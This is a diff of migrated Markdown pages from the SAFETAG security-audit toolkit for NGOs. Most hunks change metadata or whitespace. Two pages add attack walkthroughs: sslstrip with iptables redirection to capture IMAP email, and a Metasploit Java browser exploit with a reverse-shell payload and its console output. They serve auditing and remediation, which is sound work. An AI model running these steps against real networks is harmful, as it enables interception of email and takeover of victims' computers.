Updated migrated content for contentascode/metalsmith-migrate-safetag#3

content/toolkit/activities/assessment-plan.md

@@ -3,7 +3,7 @@ id: assessment-plan
 name: Assessment Plan
 description: This component allows an auditor and host to come to an understanding of the level of access that an auditor will have,...
 origin: https://github.com/SAFETAG/SAFETAG
-origin_path: master/en/exercises/assessment_plan/summary.md
+origin_path: master/en/exercises/assessment_plan/reporting.md
 ---
 # Assessment Plan
 
@@ -38,6 +38,8 @@ See the Appendix for a DRAFT combined engagement and confidentiality agreement.
 
 
 
+
+
 <!-- Notes -->
 
 [^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

content/toolkit/activities/automated-recon.md

@@ -24,6 +24,8 @@ See the Appendix for a full walk-through of using recon-ng
 
 
 
+
+
 <!-- Notes -->
 
 [^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

content/toolkit/activities/capacity-assessment-cheatsheet.md

@@ -65,6 +65,8 @@ Preparation Support
 
 
 
+
+
 <!-- Notes -->
 
 [^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

content/toolkit/activities/check-config-files.md

@@ -17,6 +17,8 @@ Examine configuration files for vulnerabilities  using "hardening", or "common m
 
 
 
+
+
 <!-- Notes -->
 
 [^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

content/toolkit/activities/check-mail-server-vulns.md

@@ -26,26 +26,36 @@ Even an informed staff member who attempts to configure his email client to requ
 
 ## Walkthrough
 
-#### Walkthrough
 If the attacker wishes to observe the victim’s email traffic (most likely because they failed to capture an unencrypted password, which would have allowed them to log in as the victim and read their email directly), they may need to carry out a second, slightly more complex attack, which will also likely provide access to the victims password as well as the content of their email.
 
 To capture outgoing (SMTP) messages, the process is nearly identical to the traffic monitoring exercise.
 
-!INCLUDE "../traffic_monitoring/instructions.md"
+:[](../traffic_analysis/instructions.md)
 
 In order to monitor incoming (POP3 or IMAP) messages, the attacker must use other techniques to ensure that responses to the victim actually pass through their machine before they arrive at their intended recipient. The most straightforward tool for this sort of thing is designed to attack Web traffic, but the same techniques works on POP3 and IMAP traffic. (This tool, SSLStrip, was written to facilitate more advanced testing of Web services that do implement encryption, but that do so incorrectly. In any case, it works fine for our purposes here.)
 
-``$ sslstrip -a -l 12345 -w sslstrip.log
+```
+$ sslstrip -a -l 12345 -w sslstrip.log
+```
 
 The attacker then uses iptables to route a portion of the victim’s traffic (in this case, IMAP traffic destined for port 143) through the SSLStrip tool, which rewrites headers such that responses come to them first, before continuing along to the victim. The attacker then monitors the tool’s output for email messages:
 
-``$ iptables -t nat -A PREROUTING -p tcp --destination-port 143 –j REDIRECT --to-port 12345
-``$ tail -f sslstrip.log
+```
+$ iptables -t nat -A PREROUTING -p tcp --destination-port 143 –j REDIRECT --to-port 12345
+$ tail -f sslstrip.log
+```
 
 (For POP3, the attacker would use port 110 instead of port 143, but the attack is otherwise identical.) At this point, the contents of the sslstrip.log file contains a copy of incoming IMAP traffic, including any email messages the victim might read while being observed.
 
 This same technique, with minor modifications, would work to monitor incoming email messages downloaded through Webmail
 
+## Recommendation
+
+Mandatory (SSL, TLS or HTTPS) encryption on all authenticated services (especially email). This should apply to both direct connections to the email server (e.g. via IMAP, MAPI, SMTP) as well as webmail services.
+
+Those who use Outlook, or some other email client, should only be allowed to connect to the organization’s mail server using SSL or TLS encryption. Attempts to connected without encryption should fail. All staff mail clients should be reconfigured accordingly.
+
+
 
 
 <!-- Notes -->

content/toolkit/activities/check-user-browser-vulns.md

@@ -13,4 +13,80 @@ origin_path: master/en/exercises/check_user_browser_vulns/browser_java_plugin.md
 
 
 
+## summary
+
+Outdated Java browser plugins
+
+One or more of the organization’s laptops were seen to be running an outdated, known-vulnerable version of the Java plugin for Internet Explorer.
+
+
+## description
+
+This version contains a vulnerability that is easily exploitable using one of the recent Java exploit modules from the widely available Metasploit security auditing framework. These modules allow an attacker to gain complete control over the computer of a victim who visits a malicious Web site hosted anywhere on the Internet. If the attacker is inside the office LAN, they can easily trick the victim into visiting that malicious Web site without the victim even knowing it.
+
+## recommendation
+
+At least one of the organization’s computers is running an outdated Java browser plugin, and exploit code is widely-available for several critical vulnerabilities in versions older than “Java 7, update 16.” All of the organization’s Java installations should be updated to the latest version. This can be troublesome, as (unlike the Windows operating system itself) Java plugins sometimes require user input before they will install updates.
+
+
+## exploit
+
+While the threat described below is more severe if carried out by a local attacker (as they can more readily direct the victim to a malicious Web site), it also works remotely. In fact, if a user can be tricked, by a remote attacker, into clicking on a malicious email or Web link, attacks like this represent a significant perimeter threat. By compromising the victim’s machine, they can give the attacker a local point-of-presence without requiring the attacker to crack WPA keys or gain local access in some other way.
+
+Step 1: Using Metasploit, an attacker can easily create an ad hoc malicious Web site:
+
+```
+$ msfconsole
+
+IIIIII    dTb.dTb        _.---._
+  II     4'  v  'B   .'"".'/|\`.""'.
+  II     6.     .P  :  .' / | \ `.  :
+  II     'T;. .;P'  '.'  /  |  \  `.'
+  II      'T; ;P'    `. /   |   \ .'
+IIIIII     'YvP'       `-.__|__.-'
+
+I love shells --egypt
+
+
+       =[ metasploit v4.7.0-dev [core:4.7 api:1.0]
++ -- --=[ 1114 exploits - 627 auxiliary - 178 post
++ -- --=[ 307 payloads - 30 encoders - 8 nops
+
+msf > use exploit/multi/browser/java_jre17_exec
+
+msf exploit(java_jre17_exec) > set PAYLOAD java/shell/reverse_tcp
+PAYLOAD => java/shell/reverse_tcp
+
+msf exploit(java_jre17_exec) > set LHOST 192.168.1.123
+LHOST => 192.168.1.123
+
+msf exploit(java_jre17_exec) > set SRVPORT 8081
+SRVPORT => 8081
+
+msf exploit(java_jre17_exec) > set URIPATH java_test
+URIPATH => java_test
+
+msf exploit(java_jre17_exec) > run
+[*] Exploit running as background job.
+```
+
+Step 2: At this point, any local user who visits http://192.168.1.123:8081/java_test, and who is running a sufficiently out-of-date version of the Java browser plugin, stands a good chance of giving the attacker full access to his computer:
+
+```
+[*] Started reverse handler on 192.168.1.123:4444
+
+msf exploit(java_jre17_exec) >
+
+[*] Using URL: http://0.0.0.0:8081/java_test
+[*] Local IP: http://192.168.1.123:8081/java_test
+[*] Server started.
+
+msf exploit(java_jre17_exec) >
+
+<remote shell>
+```
+
+Figure 1: Attacker in control of the victim’s computer through a remote command shell
+
+
 

content/toolkit/activities/cms-version.md

@@ -61,6 +61,8 @@ Some of these services will be revealed by BuiltWith, but checking the HTTP Resp
 Guide for NGOs about DDoS: [Digital First Aid Kit](https://rarenet.github.io/DFAK/en/DDoSMitigation/)
 
 
+
+
 <!-- Notes -->
 
 [^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

content/toolkit/activities/confidentiality-agreement.md

@@ -3,7 +3,7 @@ id: confidentiality-agreement
 name: Confidentiality Agreement
 description: Negotiate an agreement with the organization that outlines how an auditor will protect the privacy of the organization...
 origin: https://github.com/SAFETAG/SAFETAG
-origin_path: master/en/exercises/confidentiality_agreement/summary.md
+origin_path: master/en/exercises/confidentiality_agreement/operational_security.md
 ---
 # Confidentiality Agreement
 
@@ -20,6 +20,8 @@ See the Appendix for a DRAFT Engagement and Confidentiality Agreement. See also
 
 
 
+
+
 <!-- Notes -->
 
 [^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

content/toolkit/activities/data-lost-and-found.md

@@ -20,6 +20,8 @@ See the Sensitive Data activity for an interactive way to gather the types of da
 
 
 
+
+
 <!-- Notes -->
 
 [^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

content/toolkit/activities/day-in-the-life.md

@@ -53,6 +53,8 @@ As you work with staff members (this pairs well with the device checklist activi
 
 
 
+
+
 <!-- Notes -->
 
 [^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

content/toolkit/activities/device-checklist.md

@@ -3,7 +3,7 @@ id: device-checklist
 name: Device and Software Version Assessment
 description: The auditor checks staff devices for updated systems and software, anti-virus and other security capabilities, and...
 origin: https://github.com/SAFETAG/SAFETAG
-origin_path: master/en/exercises/device_checklist/recommendations.md
+origin_path: master/en/exercises/device_checklist/summary.md
 ---
 # Device and Software Version Assessment
 
@@ -65,6 +65,8 @@ Most AV tools automatically update, but this can sometimes get out of sync, or i
 ##### Activate a personal firewall
 
 
+
+
 <!-- Notes -->
 
 [^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

content/toolkit/activities/dns-zone-transfer.md

@@ -66,6 +66,8 @@ In most cases, the DNS Zone Transfer policies will be set by your domain name pr
 If your organization maintains its own DNS servers, the administrator of those servers should check the zone transfer policies to prevent anonymous transfers.
 
 
+
+
 <!-- Notes -->
 
 [^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

content/toolkit/activities/firewire.md

@@ -80,6 +80,8 @@ Once again, it is worth noting that successful mitigation of this issue requires
 
 
 
+
+
 <!-- Notes -->
 
 [^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

content/toolkit/activities/follow-up-meeting.md

@@ -33,6 +33,8 @@ At the end of the call, schedule a second follow-up call to check in on their pr
 
 
 
+
+
 <!-- Notes -->
 
 [^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

content/toolkit/activities/guided-tour.md

@@ -58,6 +58,8 @@ _De-activate unused network ports_
 Hard-wired network ports tend to connect directly into the most trusted parts of a network.  De-activating any that are in public areas of the office (front desk, conference rooms, break rooms), as well as any that are not needed is recommended.
 
 
+
+
 <!-- Notes -->
 
 [^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

content/toolkit/activities/identify-recommendations.md

@@ -14,6 +14,8 @@ origin_path: master/en/exercises/identify_recommendations/index.md
 
 
 
+
+
 <!-- Notes -->
 
 [^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

content/toolkit/activities/identify-useful-resources.md

@@ -30,6 +30,8 @@ This can include, but is not limited to, local technical support and incident re
 
 
 
+
+
 <!-- Notes -->
 
 [^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

content/toolkit/activities/incident-response.md

@@ -17,6 +17,8 @@ Establish a procedure for incident handling and an emergency contact in the even
 
 
 
+
+
 <!-- Notes -->
 
 [^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

content/toolkit/activities/insecure-website-login.md

@@ -36,6 +36,8 @@ If an organization updates their website via FTP, it is worth noting that FTP is
 When switching to SSL/Secure FTP after having used the plain versions, webmasters should also update all administrative passwords, and watch to make sure that no step along the way (hosting provider management/panel, file upload, CMS editing) goes over “clear” channels.
 
 
+
+
 <!-- Notes -->
 
 [^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

content/toolkit/activities/interviews.md

@@ -3,7 +3,7 @@ id: interviews
 name: Interviews
 description: The auditor conducts interviews with various staff members to gather information on the organizations risks and...
 origin: https://github.com/SAFETAG/SAFETAG
-origin_path: master/en/exercises/interviews/summary.md
+origin_path: master/en/exercises/interviews/operational_security.md
 ---
 # Interviews
 
@@ -22,6 +22,8 @@ Q&A sessions are unabashedly _white box_ aspects of a security assessment, and y
 
 
 
+
+
 <!-- Notes -->
 
 [^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

content/toolkit/activities/long-term-follow-up.md

@@ -27,6 +27,8 @@ This can be combined with the Staff Feedback Survey exercise, or to follow up on
 
 
 
+
+
 <!-- Notes -->
 
 [^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

content/toolkit/activities/mac-filtering.md

@@ -43,6 +43,8 @@ ifconfig mon0 up
 Transitioning to WPA networks with strong passwords, even for guest networks, is recommended.  
 
 
+
+
 <!-- Notes -->
 
 [^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

content/toolkit/activities/making-introductions.md

@@ -26,6 +26,8 @@ Follow up with both the organization and the resources introduced to check in on
 
 
 
+
+
 <!-- Notes -->
 
 [^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

content/toolkit/activities/manual-recon.md

@@ -53,6 +53,8 @@ Google dorking tricks:
 
 
 
+
+
 <!-- Notes -->
 
 [^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

content/toolkit/activities/monitor-open-wireless-traffic.md

@@ -119,6 +119,8 @@ See [wikipedia]( https://en.wikipedia.org/wiki/Wi-Fi_positioning_system#Public_W
 * Skyhook: http://www.skyhookwireless.com/opt-out-of-skyhook-products
 
 
+
+
 <!-- Notes -->
 
 [^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

content/toolkit/activities/mx-record-search.md

@@ -3,7 +3,7 @@ id: mx-record-search
 name: Mail Exchange Record Search
 description: MX, or Mail Exchange, records are required to be public for any domain you wish to receive email through. These records...
 origin: https://github.com/SAFETAG/SAFETAG
-origin_path: master/en/exercises/mx-record-search/summary.md
+origin_path: master/en/exercises/mx-record-search/recommendations.md
 ---
 # Mail Exchange Record Search
 
@@ -45,6 +45,8 @@ No fix needed
 Unless other assessments reveals specific vulnerabilities in e-mail services used, there is no action to take. Unless you have sufficient in-house expertise, it is often recommended to not host email servers. While self-hosted email provides more control and potentially security, managing the security of the server is a complex job. Other mail services, such as MailControl or Postini, also can provide some level of protection by being a first-pass check for spam and viruses, and (slightly) reducing the visibility of your organizational mail server.
 
 
+
+
 <!-- Notes -->
 
 [^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

content/toolkit/activities/network-scanning.md

@@ -53,6 +53,8 @@ While office networks are often treated as "trusted" spaces, measures should be
 A policy should be in place for connecting personal devices to work networks, as well as work devices to non-work networks.
 
 
+
+
 <!-- Notes -->
 
 [^external_funding_and_reporting]:Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.